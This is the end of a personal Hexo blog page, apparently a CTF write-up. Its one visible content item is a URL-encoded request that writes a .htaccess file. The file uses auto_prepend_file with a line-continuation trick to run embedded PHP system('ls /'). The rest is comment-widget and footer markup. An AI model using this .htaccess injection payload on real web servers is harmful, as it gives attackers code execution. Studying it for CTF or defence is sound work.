<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token operator">?</span>filename<span class="token operator">=</span><span class="token operator">.</span>htaccess<span class="token operator">&amp;</span>content<span class="token operator">=</span>php_value<span class="token operator">+</span>auto_prepend_fi<span class="token operator">%</span><span class="token number">5</span>C<span class="token operator">%</span><span class="token number">0</span>D<span class="token operator">%</span><span class="token number">0</span>Ale<span class="token operator">+</span><span class="token operator">.</span>htaccess<span class="token operator">%</span><span class="token number">0</span>D<span class="token operator">%</span><span class="token number">0</span>A<span class="token operator">%</span><span class="token number">23</span><span class="token operator">%</span><span class="token number">3</span>C<span class="token operator">%</span><span class="token number">3</span>Fphp<span class="token operator">%</span><span class="token number">20</span>system<span class="token punctuation">(</span><span class="token string single-quoted-string">'ls /'</span><span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">3</span>B<span class="token operator">%</span><span class="token number">3</span>F<span class="token operator">%</span><span class="token number">3</span>E<span class="token operator">%</span><span class="token number">0</span>D<span class="token operator">%</span><span class="token number">0</span>A<span class="token operator">%</span><span class="token number">23</span><span class="token operator">%</span><span class="token number">5</span>C<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<hr>

    </div>
    
    
    
    
    
    
    
</div>

            </div>
            </transition>
            
            <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
            </transition>
            
        </div>
        <script src="/blog/js/main.js"></script>
        
        




         
        
    <div id="vcomments"></div>
    
        <script src="/blog/js/lib/valine.min.js"></script>
            <script>
                new Valine({
                    el: '#vcomments',
                    app_id: 'U9mZLKunkRUTcBFthjXPjnZE-9Nh9j0Va',
                    app_key: 'SzWOnY0PWLGNuL6jW8TZYc7j',
                    visitor: 'true',
                    placeholder: '写点什么吧(●ˇ∀ˇ●)',
                    serverURLs: 'https://u9mzlkun.lc-cn-e1-shared.com',
                });
            </script>

        <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2023 雲流のLowest World
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;C1oudfL0w0
            <span id="busuanzi_container_site_uv"> 
                本站访客数<span id="busuanzi_value_site_uv"></span>人次
            </span>
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

    <script src="/blog/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/blog/live2dw/assets/z16.model.json"},"display":{"position":"left","width":150,"height":290},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>

